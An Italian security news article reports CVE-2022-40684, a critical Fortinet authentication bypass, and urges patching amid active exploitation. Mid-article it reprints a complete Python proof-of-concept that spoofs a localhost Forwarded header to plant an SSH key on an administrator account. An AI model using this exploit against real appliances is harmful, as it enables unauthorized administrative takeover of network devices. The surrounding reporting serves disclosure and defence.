Red Hot Cyber
Sicurezza Informatica, Notizie su Cybercrime e Analisi Vulnerabilità
Il PoC di sfruttamento dell’Authentication Bypass di Fortinet è online

Il PoC di sfruttamento dell’Authentication Bypass di Fortinet è online

14 Ottobre 2022 15:14

Fortinet ha recentemente corretto una vulnerabilità critica di bypass dell’autenticazione nei progetti FortiOS, FortiProxy e FortiSwitchManager (CVE-2022-40684). Questa vulnerabilità offre a un utente malintenzionato la possibilità di accedere come amministratore al sistema interessato.

È stato reso disponibile un codice exploit proof-of-concept (PoC), rendendo di fatto ancora più essenziale l’installazione delle patch prodotte dal vendor, qualora non siano impostati gli aggiornamenti automatizzati.

Advertising

“FortiOS espone il portale web di gestione che consente a un utente di configurare il sistema”

ha affermato il ricercatore di sicurezza dell’azienda Horizon3.ai James Horseman .

“Inoltre, un utente può SSH nel sistema che espone un’interfaccia CLI bloccata.”

#!/usr/bin/python3
import argparse
import json
import requests
import urllib3
requests.packages.urllib3.disable_warnings()
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


HEADERS = {
    'User-Agent': 'Report Runner',
    'Forwarded': 'for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"'
}

def format_key(key_file):
    with open(key_file) as f:
        k = f.read().strip()

    return(k)


def add_key(target, username, key_file):
    key = format_key(key_file)
    j = {
        "ssh-public-key1": '\"' + key + '\"'
    }
    url = f'https://{target}/api/v2/cmdb/system/admin/{username}'
    r = requests.put(url, headers=HEADERS, json=j, verify=False)
    if 'SSH key is good' not in r.text:
        print(f'[-] {target} is not vulnerable!')
    else:
        print(f'[+] SSH key for {username} added successfully!')

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
    parser.add_argument('-u', '--username', help='The user to add an SSH key file for', required=True)
    parser.add_argument('-k', '--key-file', help='The SSH key file', required=True)
    args = parser.parse_args()

    add_key(args.target, args.username, args.key_file)

Il problema, rilevato come CVE-2022-40684 (punteggio CVSS: 9,6), riguarda una vulnerabilità di bypass dell’autenticazione che potrebbe consentire a un utente malintenzionato remoto di eseguire operazioni dannose sull’interfaccia amministrativa tramite richieste HTTP(S) appositamente predisposte.

Sfruttare con successo la carenza, equivale a garantire l’accesso completo “per fare qualsiasi cosa” sul sistema interessato, inclusa la modifica delle configurazioni di rete, l’aggiunta di utenti malintenzionati e l’intercettazione del traffico di rete.

Il rilascio del PoC arriva quando Fortinet ha avvertito di essere a conoscenza di uno sfruttamento attivo della falla di sicurezza, spingendo la Cybersecurity and Infrastructure Security Agency (CISA) degli Stati Uniti a emettere un avviso che esorta le agenzie federali a correggere il problema entro novembre 1, 2022.

La società di intelligence sulle minacce GreyNoise ha rilevato 12 indirizzi IP univoci che utilizzavano la CVE-2022-40684 a partire dal 13 ottobre 2022, la maggior parte dei quali si trova in Germania, seguita da Stati Uniti, Brasile, Cina e Francia.



Ti è piaciuto questo articolo? Ne stiamo discutendo nella nostra Community su LinkedIn, Facebook e Instagram. Seguici anche su Google News, per ricevere aggiornamenti quotidiani sulla sicurezza informatica o Scrivici se desideri segnalarci notizie, approfondimenti o contributi da pubblicare.

Manuel Roccon 300x300
Ho iniziato la mia carriera occuparmi nella ricerca e nell’implementazioni di soluzioni in campo ICT e nello sviluppo di applicazioni. Al fine di aggiungere aspetti di sicurezza in questi campi, da alcuni anni ho aggiunto competenze inerenti al ramo offensive security (OSCP), occupandomi anche di analisi di sicurezza e pentest in molte organizzazioni.
Aree di competenza: Ethical Hacking, Bug Hunting, Penetration Testing, Red Teaming, Security Research, Cybersecurity Communication